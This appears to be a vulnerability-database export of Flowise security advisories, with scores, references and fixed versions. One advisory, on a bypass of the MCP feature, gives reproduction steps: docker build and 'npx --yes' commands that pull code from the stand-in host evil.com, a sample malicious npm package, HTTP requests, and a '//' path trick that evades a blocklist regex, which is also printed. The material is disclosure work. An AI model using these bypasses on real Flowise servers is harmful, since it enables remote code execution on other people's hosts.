scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:26:39Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-4jpm-cgx2-8h37
fixed_packages
0
url pkg:npm/flowise@3.1.0
purl pkg:npm/flowise@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2891-vddv-ebff
1
vulnerability VCID-3chx-dj2u-kbab
2
vulnerability VCID-5j9e-bcr5-n7bs
3
vulnerability VCID-67mz-pfy4-ykep
4
vulnerability VCID-9rqv-p7rz-5kar
5
vulnerability VCID-cb6d-4c2v-w7c3
6
vulnerability VCID-cxja-9yxc-k7au
7
vulnerability VCID-gt6n-beak-33gy
8
vulnerability VCID-hdej-umwh-kqav
9
vulnerability VCID-kpyg-gve3-b3av
10
vulnerability VCID-qm89-q2ar-uyhy
11
vulnerability VCID-r74e-k86f-7qgb
12
vulnerability VCID-s3jg-wce1-fbf3
13
vulnerability VCID-xt1d-efw7-g3c6
14
vulnerability VCID-z1y2-f2ws-8ycb
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0
aliases CVE-2026-41266, GHSA-4jpm-cgx2-8h37
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-aqg8-6us7-uqef
20
url VCID-b97u-efzx-dffn
vulnerability_id VCID-b97u-efzx-dffn
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the GraphCypherQAChain node forwards user-provided input directly into the Cypher query execution pipeline without proper sanitization. An attacker can inject arbitrary Cypher commands that are executed on the underlying Neo4j database, enabling data exfiltration, modification, or deletion. This vulnerability is fixed in 3.1.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-41274
reference_id
reference_type
scores
0
value 0.00232
scoring_system epss
scoring_elements 0.46306
published_at 2026-06-12T12:55:00Z
1
value 0.00232
scoring_system epss
scoring_elements 0.46303
published_at 2026-06-14T12:55:00Z
2
value 0.00232
scoring_system epss
scoring_elements 0.46162
published_at 2026-06-11T12:55:00Z
3
value 0.00232
scoring_system epss
scoring_elements 0.46317
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-41274
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-41274
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-41274
2
reference_url https://github.com/advisories/GHSA-28g4-38q8-3cwc
reference_id GHSA-28g4-38q8-3cwc
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-28g4-38q8-3cwc
3
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-28g4-38q8-3cwc
reference_id GHSA-28g4-38q8-3cwc
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-24T16:20:30Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-28g4-38q8-3cwc
fixed_packages
0
url pkg:npm/flowise@3.1.0
purl pkg:npm/flowise@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2891-vddv-ebff
1
vulnerability VCID-3chx-dj2u-kbab
2
vulnerability VCID-5j9e-bcr5-n7bs
3
vulnerability VCID-67mz-pfy4-ykep
4
vulnerability VCID-9rqv-p7rz-5kar
5
vulnerability VCID-cb6d-4c2v-w7c3
6
vulnerability VCID-cxja-9yxc-k7au
7
vulnerability VCID-gt6n-beak-33gy
8
vulnerability VCID-hdej-umwh-kqav
9
vulnerability VCID-kpyg-gve3-b3av
10
vulnerability VCID-qm89-q2ar-uyhy
11
vulnerability VCID-r74e-k86f-7qgb
12
vulnerability VCID-s3jg-wce1-fbf3
13
vulnerability VCID-xt1d-efw7-g3c6
14
vulnerability VCID-z1y2-f2ws-8ycb
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0
aliases CVE-2026-41274, GHSA-28g4-38q8-3cwc
risk_score 4.2
exploitability 0.5
weighted_severity 8.4
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-b97u-efzx-dffn
21
url VCID-bkmk-k9mn-ekhx
vulnerability_id VCID-bkmk-k9mn-ekhx
summary 
Flowise: Weak Default Express Session Secret
**Detection Method:** Kolega.dev Deep Code Scan

| Attribute | Value |
|---|---|
| Location | packages/server/src/enterprise/middleware/passport/index.ts:55 |
| Practical Exploitability | High |
| Developer Approver | faizan@kolega.ai |

### Description
Express session secret has a weak default value 'flowise' when EXPRESS_SESSION_SECRET is not set.

### Affected Code
```
secret: process.env.EXPRESS_SESSION_SECRET || 'flowise'
```

### Evidence
The default session secret 'flowise' is publicly visible and weak. Session cookies signed with this secret can be forged by attackers.

### Impact
Session hijacking and forgery - attackers can create arbitrary session cookies to impersonate any user, bypassing all authentication mechanisms.

### Recommendation
Require EXPRESS_SESSION_SECRET to be set with a strong random value. Throw an error on startup if not configured. Use cryptographically strong random strings (minimum 256 bits).

### Notes
The Express session secret defaults to the string 'flowise' when EXPRESS_SESSION_SECRET is not set (line 55). This secret is used to sign session cookies via express-session middleware. Since 'flowise' is publicly visible in the source code, an attacker can forge valid session cookies to impersonate any user without authentication. The .env.example file has this commented out (# EXPRESS_SESSION_SECRET=flowise), implying it's optional, which compounds the risk. Unlike development-only defaults, this code path is active in production if the environment variable is not set. The application should require EXPRESS_SESSION_SECRET to be explicitly configured with a cryptographically strong random value and fail to start otherwise.
references
0
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-2qqc-p94c-hxwh
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-2qqc-p94c-hxwh
1
reference_url https://github.com/advisories/GHSA-2qqc-p94c-hxwh
reference_id GHSA-2qqc-p94c-hxwh
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-2qqc-p94c-hxwh
fixed_packages
0
url pkg:npm/flowise@3.1.0
purl pkg:npm/flowise@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2891-vddv-ebff
1
vulnerability VCID-3chx-dj2u-kbab
2
vulnerability VCID-5j9e-bcr5-n7bs
3
vulnerability VCID-67mz-pfy4-ykep
4
vulnerability VCID-9rqv-p7rz-5kar
5
vulnerability VCID-cb6d-4c2v-w7c3
6
vulnerability VCID-cxja-9yxc-k7au
7
vulnerability VCID-gt6n-beak-33gy
8
vulnerability VCID-hdej-umwh-kqav
9
vulnerability VCID-kpyg-gve3-b3av
10
vulnerability VCID-qm89-q2ar-uyhy
11
vulnerability VCID-r74e-k86f-7qgb
12
vulnerability VCID-s3jg-wce1-fbf3
13
vulnerability VCID-xt1d-efw7-g3c6
14
vulnerability VCID-z1y2-f2ws-8ycb
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0
aliases GHSA-2qqc-p94c-hxwh
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-bkmk-k9mn-ekhx
22
url VCID-cb6d-4c2v-w7c3
vulnerability_id VCID-cb6d-4c2v-w7c3
summary 
Flowise has an MCP Security Bypass that Enables RCE
## Summary
There are three bypass methods for the security limitations of the Flowise MCP feature, and attackers can execute arbitrary commands by combining these three methods

## Details


### 【Vulnerability  one】The Docker build subcommand not being on the blocklist leads to remote code execution 

The attacker configures the interface through the MCP tool to provide {"command":"docker","args":["build","https://evil.com/"]} as the Custom MCP Server configuration 
→ Bypass the validateCommandFlags docker blocklist (only blocks run/exec/-v/--volume, etc., but does not block build)
→ docker build <remote-URL> will pull the Dockerfile from the remote address and execute the RUN instructions within it
→ Allows attackers to escape from Docker through methods such as mounting, thereby gaining full control of the Flowise host machine 

Precondition: 
1. Have a Flowise account (any role, including regular users) or an API with view&update permissions for chatflows
2. The deployment environment has the docker command

Vulnerable function - validateCommandFlags: 

```
file: packages/components/nodes/tools/MCP/core.ts:260-310

const COMMAND_FLAG_BLACKLIST: Record<string, string[]> = {
    docker: [
        'run', 'exec', '-v', '--volume', '--privileged', '--cap-add',
        '--security-opt', '--network', '--pid', '--ipc'
        //  'build', 'pull', 'push', 'cp', 'commit' are not on the blocklist 
    ],
    npx: ['-c', '--call', '--shell-auto-fallback', '-y'],
    npm: ['run', 'exec', 'install', '--prefix', '-g', '--global', 'publish', 'adduser', 'login'],
    // ...
}
export function validateCommandFlags(command: string, args: string[]): ValidationResult {
    const blacklist = COMMAND_FLAG_BLACKLIST[command] || []
    for (const arg of args) {
        if (blacklist.includes(arg)) {
            return { valid: false, error: `Argument '${arg}' is not allowed for command '${command}'` }
        }
    }
    return { valid: true }
}
```

Reproduction process:

Add MCP config via UI or API interface, for example: 

<img width="1280" height="414" alt="2f0b6dfad5458616781921e1c28339d0" src="https://github.com/user-attachments/assets/6c8419c5-6261-46bb-8a30-3ac1ec3fb599" />

Then execute: 

```
POST /api/v1/prediction/{chatflows_id} HTTP/1.1
Host: 127.0.0.1:3000
Content-Type: application/json
Authorization: Bearer apikey
Content-Length: 17

{"question": "1"}
```

After execution, the command can be triggered to execute docker build http://evil.com 

<img width="1280" height="319" alt="f98e1d91428be6077ac6cf0472285f17" src="https://github.com/user-attachments/assets/856d46b4-7949-4091-bed9-a7c3fecc62f0" />

If a privileged container is deployed, then it can fully control the Flowise host machine 

### 【Vulnerability  two】 npx --yes long parameter alias bypassing blocklist leads to remote code execution

The attacker configures the MCP tool to provide {"command":"npx","args":["--yes","malicious-package"]} 
→ validateCommandFlags npx blocklist only contains short parameter -y, and does not block long parameter alias --yes
→ npx --yes malicious-package automatically agrees to install and execute any npm package
→ Leads to remote code execution (RCE) on the server 

Precondition: 
1. Have a Flowise account (any role, including regular users) or an API with view&update permissions for chatflows
2. The deployment environment has the npx command

npx blocklist:

```
file: packages/components/nodes/tools/MCP/core.ts:270-280

npx: ['-c', '--call', '--shell-auto-fallback', '-y'],
//    Only the short parameter -y is present, without the long parameter alias --yes
```

Reproduction process:
Add MCP config via UI or API interface, for example: 

<img width="1910" height="690" alt="85ea14ea224df9ed501827dfa47afb09" src="https://github.com/user-attachments/assets/8f3a2299-5460-4d23-b113-79ba4a9e52b6" />

```
{
  "command": "npx",
  "args":["--yes", "http://evil.com/FileName.tar"]
}
```

Contents of the tar file:

```
// index.js
#!/usr/bin/env node
const http = require('http');
const { execSync } = require('child_process');

const result = execSync('id && hostname').toString().trim();
console.error('[MCP-RCE-002] npx --yes bypass: ' + result);

// package.json
{
  "name": "attacker-mcp-pkg",
  "version": "1.0.0",
  "bin": {
    "attacker-mcp-pkg": "./index.js"
  },
  "scripts": {
    "postinstall": ""
  }
}
```
Then execute: 

```
POST /api/v1/prediction/{chatflows_id} HTTP/1.1
Host: 127.0.0.1:3000
Content-Type: application/json
Authorization: Bearer apikey
Content-Length: 17

{"question": "1"}
```

can trigger the vulnerability, execute the attacker's commands, and achieve RCE:

<img width="3026" height="256" alt="4c466067deb4606a38e4b73806661328" src="https://github.com/user-attachments/assets/e9821e3f-bda4-4c6a-bcd1-0b19053045c9" />

### node command bypassing local file restrictions leads to remote code execution

When configuring the CustomMCP node, the attacker provides {"command":"node","args":["local file"]} 
→ Bypass the security restrictions of validateArgsForLocalFileAccess 
→ Node process loads local files and executes arbitrary code → RCE 

Precondition: 
Have a Flowise account 

Analysis of Vulnerable Code:

```
// packages/components/nodes/tools/MCP/core.ts:177-220

export const validateArgsForLocalFileAccess = (args: string[]): void => {
    const dangerousPatterns = [
        // Absolute paths
        /^\/[^/]/, // Unix absolute paths starting with /
        /^[a-zA-Z]:\\/, // Windows absolute paths like C:\

        // Relative paths that could escape current directory
        /\.\.\//, // Parent directory traversal with ../
        /\.\.\\/, // Parent directory traversal with ..\
        /^\.\./, // Starting with ..

        // Local file access patterns
        /^\.\//, // Current directory with ./
        /^~\//, // Home directory with ~/
        /^file:\/\//, // File protocol

        // Common file extensions that shouldn't be accessed
        /\.(exe|bat|cmd|sh|ps1|vbs|scr|com|pif|dll|sys)$/i,

        // File flags and options that could access local files
        /^--?(?:file|input|output|config|load|save|import|export|read|write)=/i,
        /^--?(?:file|input|output|config|load|save|import|export|read|write)$/i
    ]
```

The above are the main restrictions imposed by the validateArgsForLocalFileAccess function, and it can be found that the regular expression "/^\/[^/]/" has a matching issue 

As the comment says, this regular expression essentially detects whether it is a Unix absolute path, which matches /etc/passwd but does not match //etc/passwd (the second character is '/') 

<img width="1280" height="570" alt="ea354264cbb2ace6a3a6a16e00f1d298" src="https://github.com/user-attachments/assets/9ca88790-77ea-4d42-8910-09e4453f981a" />

Therefore, the limitation of this function can be bypassed by starting with //

** Reproduction process: **

Create a new chatflow as follows:

<img width="1280" height="716" alt="7e884613b5897509b39467f8f3b7aae1" src="https://github.com/user-attachments/assets/478c7a89-4e77-4a5d-b063-de16cb640f92" />

After saving, cmd.js will be uploaded to the ~/.flowise/storage/{orgId}/{chatflow_id}/ directory

orgId can be obtained during login, and chatflow_id will also be returned when saving chatflow:

<img width="1280" height="702" alt="48b5ab8412babba312f502be5db1dad3" src="https://github.com/user-attachments/assets/090292cf-6361-43cd-91d7-eec6e578255b" />

For example: 
```
~/.flowise/storage/d2312f99-9043-413a-a1d2-3b7685a132b2/f8cc7f34-a1e5-4180-940a-47306d32adc2/cmd.js
```

Since paths like ~/ are restricted, and an absolute path needs to be obtained, use the following method:

<img width="1280" height="716" alt="990e1c81ed3957c5ae823e55efec15a5" src="https://github.com/user-attachments/assets/02c2a949-559a-4ee4-9675-c50a203d1e99" />

```
POST /api/v1/export-import/import  HTTP/1.1
Host: 127.0.0.1:3000
Content-Type: application/json
x-request-from: internal
Cookie: cookie
Connection: keep-alive
Content-Length: 479

 {
    "ChatMessage": [
      {
        "id": "11111111-2222-4333-8444-555555555555",
        "role": "userMessage",
        "chatflowid": "{chatflow_id}",
        "content": "seed for home path test",
        "chatType": "EXTERNAL",
        "chatId": "audit-home-001",
        "createdDate": "2026-03-04T06:40:00.000Z",
        "fileUploads": "[{\"type\":\"stored-file\",\"name\":\"poc.txt\",\"mime\":\"text/plain\"}]"
      }
    ]
  }
```


<img width="1280" height="748" alt="d7f947940f4e6b6e95a61bcc301c25c0" src="https://github.com/user-attachments/assets/482fb78c-dbc8-4a0d-a042-4c993e976f10" />

```
POST /api/v1/export-import/chatflow-messages HTTP/1.1
Host: 127.0.0.1:3000
Content-Type: application/json
x-request-from: internal
Cookie: cookie
Connection: keep-alive
Content-Length: 57

{"chatflowId":"{chatflow_id}"}

```

After obtaining the absolute path, simply modify the path in args to the path of the file name: 

```
  {
    "command": "node",
    "args": ["//root/.flowise/storage/d2312f99-9043-413a-a1d2-3b7685a132b2/f8cc7f34-a1e5-4180-940a-47306d32adc2/cmd.js"]
  }
```

After saving, execution will trigger RCE 


```
POST /api/v1/prediction/{chatflows_id} HTTP/1.1
Host: 127.0.0.1:3000
Content-Type: application/json
Authorization: Bearer apikey
Content-Length: 17

{"question": "1"}
```

## Impact

This vulnerability allows attackers to execute arbitrary commands on the Flowise server .
references
0
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-m99r-2hxc-cp3q
reference_id
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-m99r-2hxc-cp3q
1
reference_url https://github.com/advisories/GHSA-m99r-2hxc-cp3q
reference_id GHSA-m99r-2hxc-cp3q
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-m99r-2hxc-cp3q
fixed_packages
0
url pkg:npm/flowise@3.1.2
purl pkg:npm/flowise@3.1.2
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.2
aliases GHSA-m99r-2hxc-cp3q
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-cb6d-4c2v-w7c3
23
url VCID-cxja-9yxc-k7au
vulnerability_id VCID-cxja-9yxc-k7au
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, a mass assignment vulnerability exists in the assistant update endpoint of FlowiseAI. The endpoint allows authenticated users to modify server-controlled properties such as workspaceId, createdDate, and updatedDate when updating an assistant resource. Due to missing server-side validation and authorization checks, an attacker can manipulate the workspaceId field and reassign assistants to arbitrary workspaces. This breaks tenant isolation in multi-workspace environments. This issue has been patched in version 3.1.2.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-46441
reference_id
reference_type
scores
0
value 0.00062
scoring_system epss
scoring_elements 0.19589
published_at 2026-06-11T12:55:00Z
1
value 0.0008
scoring_system epss
scoring_elements 0.23871
published_at 2026-06-12T12:55:00Z
2
value 0.0008
scoring_system epss
scoring_elements 0.23879
published_at 2026-06-13T12:55:00Z
3
value 0.0009
scoring_system epss
scoring_elements 0.25657
published_at 2026-06-14T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-46441
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-46441
reference_id
reference_type
scores
0
value 7.6
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-46441
2
reference_url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2
reference_id flowise%403.1.2
reference_type
scores
0
value 7.6
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-06-08T16:27:47Z/
url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2
3
reference_url https://github.com/advisories/GHSA-hp26-q66v-q2w7
reference_id GHSA-hp26-q66v-q2w7
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-hp26-q66v-q2w7
4
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-hp26-q66v-q2w7
reference_id GHSA-hp26-q66v-q2w7
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
1
value 7.6
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-06-08T16:27:47Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-hp26-q66v-q2w7
fixed_packages
0
url pkg:npm/flowise@3.1.2
purl pkg:npm/flowise@3.1.2
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.2
aliases CVE-2026-46441, GHSA-hp26-q66v-q2w7
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-cxja-9yxc-k7au
24
url VCID-d4wa-szeh-43ab
vulnerability_id VCID-d4wa-szeh-43ab
summary
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-41267
reference_id
reference_type
scores
0
value 0.00828
scoring_system epss
scoring_elements 0.74961
published_at 2026-06-11T12:55:00Z
1
value 0.00828
scoring_system epss
scoring_elements 0.75032
published_at 2026-06-12T12:55:00Z
2
value 0.00828
scoring_system epss
scoring_elements 0.75045
published_at 2026-06-13T12:55:00Z
3
value 0.00828
scoring_system epss
scoring_elements 0.75041
published_at 2026-06-14T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-41267
1
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-48m6-ch88-55mj
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-48m6-ch88-55mj
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-41267
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-41267
3
reference_url https://github.com/advisories/GHSA-48m6-ch88-55mj
reference_id GHSA-48m6-ch88-55mj
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-48m6-ch88-55mj
fixed_packages
0
url pkg:npm/flowise@3.1.0
purl pkg:npm/flowise@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2891-vddv-ebff
1
vulnerability VCID-3chx-dj2u-kbab
2
vulnerability VCID-5j9e-bcr5-n7bs
3
vulnerability VCID-67mz-pfy4-ykep
4
vulnerability VCID-9rqv-p7rz-5kar
5
vulnerability VCID-cb6d-4c2v-w7c3
6
vulnerability VCID-cxja-9yxc-k7au
7
vulnerability VCID-gt6n-beak-33gy
8
vulnerability VCID-hdej-umwh-kqav
9
vulnerability VCID-kpyg-gve3-b3av
10
vulnerability VCID-qm89-q2ar-uyhy
11
vulnerability VCID-r74e-k86f-7qgb
12
vulnerability VCID-s3jg-wce1-fbf3
13
vulnerability VCID-xt1d-efw7-g3c6
14
vulnerability VCID-z1y2-f2ws-8ycb
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0
aliases CVE-2026-41267, GHSA-48m6-ch88-55mj
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-d4wa-szeh-43ab
25
url VCID-dtss-epth-z7fh
vulnerability_id VCID-dtss-epth-z7fh
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.0.13, Flowise exposes an HTTP Node in AgentFlow and Chatflow that performs server-side HTTP requests using user-controlled URLs. By default, there are no restrictions on target hosts, including private/internal IP ranges (RFC 1918), localhost, or cloud metadata endpoints. This enables Server-Side Request Forgery (SSRF), allowing any user interacting with a publicly exposed chatflow to force the Flowise server to make requests to internal network resources that are inaccessible from the public internet. This vulnerability is fixed in 3.0.13.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-31829
reference_id
reference_type
scores
0
value 0.00103
scoring_system epss
scoring_elements 0.27704
published_at 2026-06-11T12:55:00Z
1
value 0.00103
scoring_system epss
scoring_elements 0.27905
published_at 2026-06-12T12:55:00Z
2
value 0.00103
scoring_system epss
scoring_elements 0.27931
published_at 2026-06-13T12:55:00Z
3
value 0.00103
scoring_system epss
scoring_elements 0.27921
published_at 2026-06-14T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-31829
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-31829
reference_id CVE-2026-31829
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-31829
2
reference_url https://github.com/advisories/GHSA-fvcw-9w9r-pxc7
reference_id GHSA-fvcw-9w9r-pxc7
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-fvcw-9w9r-pxc7
3
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-fvcw-9w9r-pxc7
reference_id GHSA-fvcw-9w9r-pxc7
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L
1
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L
2
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-11T14:15:56Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-fvcw-9w9r-pxc7
fixed_packages
0
url pkg:npm/flowise@3.0.13
purl pkg:npm/flowise@3.0.13
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14af-nhf3-aqba
1
vulnerability VCID-17k4-psgt-sydg
2
vulnerability VCID-19jc-umg6-v7ce
3
vulnerability VCID-1xfp-4rtg-4bcu
4
vulnerability VCID-2891-vddv-ebff
5
vulnerability VCID-3chx-dj2u-kbab
6
vulnerability VCID-3gp6-wwtd-kkf1
7
vulnerability VCID-5j9e-bcr5-n7bs
8
vulnerability VCID-5pup-kgaf-3ubw
9
vulnerability VCID-67mz-pfy4-ykep
10
vulnerability VCID-71uq-yx2j-cqak
11
vulnerability VCID-9rqv-p7rz-5kar
12
vulnerability VCID-a1e4-f5dh-w3a5
13
vulnerability VCID-aqg8-6us7-uqef
14
vulnerability VCID-b97u-efzx-dffn
15
vulnerability VCID-bkmk-k9mn-ekhx
16
vulnerability VCID-cb6d-4c2v-w7c3
17
vulnerability VCID-cxja-9yxc-k7au
18
vulnerability VCID-d4wa-szeh-43ab
19
vulnerability VCID-dzed-27rk-3qav
20
vulnerability VCID-e65e-s5sd-kuhp
21
vulnerability VCID-ejdc-j73x-jydk
22
vulnerability VCID-fu6t-9dk4-jbh9
23
vulnerability VCID-gt6n-beak-33gy
24
vulnerability VCID-gvpx-4wkw-43cz
25
vulnerability VCID-hdej-umwh-kqav
26
vulnerability VCID-hkfs-v3bp-kbh5
27
vulnerability VCID-j5hh-haj2-qydg
28
vulnerability VCID-kpyg-gve3-b3av
29
vulnerability VCID-pzza-9xq9-a7de
30
vulnerability VCID-qm89-q2ar-uyhy
31
vulnerability VCID-r74e-k86f-7qgb
32
vulnerability VCID-rgmv-6bqh-eqf2
33
vulnerability VCID-s3jg-wce1-fbf3
34
vulnerability VCID-tdm1-91mc-8kgr
35
vulnerability VCID-v1nz-wwsu-qycg
36
vulnerability VCID-v9hg-7pex-g3dp
37
vulnerability VCID-w9yr-5jbp-q7fm
38
vulnerability VCID-xt1d-efw7-g3c6
39
vulnerability VCID-z1y2-f2ws-8ycb
40
vulnerability VCID-zwna-stj5-3yhm
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.13
aliases CVE-2026-31829, GHSA-fvcw-9w9r-pxc7
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-dtss-epth-z7fh
26
url VCID-dzed-27rk-3qav
vulnerability_id VCID-dzed-27rk-3qav
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, Flowise contains an authentication bypass vulnerability that allows an unauthenticated attacker to obtain OAuth 2.0 access tokens associated with a public chatflow. By accessing a public chatflow configuration endpoint, an attacker can retrieve internal workflow data, including OAuth credential identifiers, which can then be used to refresh and obtain valid OAuth 2.0 access tokens without authentication. This vulnerability is fixed in 3.1.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-41273
reference_id
reference_type
scores
0
value 0.0021
scoring_system epss
scoring_elements 0.43711
published_at 2026-06-13T12:55:00Z
1
value 0.0021
scoring_system epss
scoring_elements 0.43702
published_at 2026-06-14T12:55:00Z
2
value 0.0021
scoring_system epss
scoring_elements 0.43534
published_at 2026-06-11T12:55:00Z
3
value 0.0021
scoring_system epss
scoring_elements 0.43691
published_at 2026-06-12T12:55:00Z
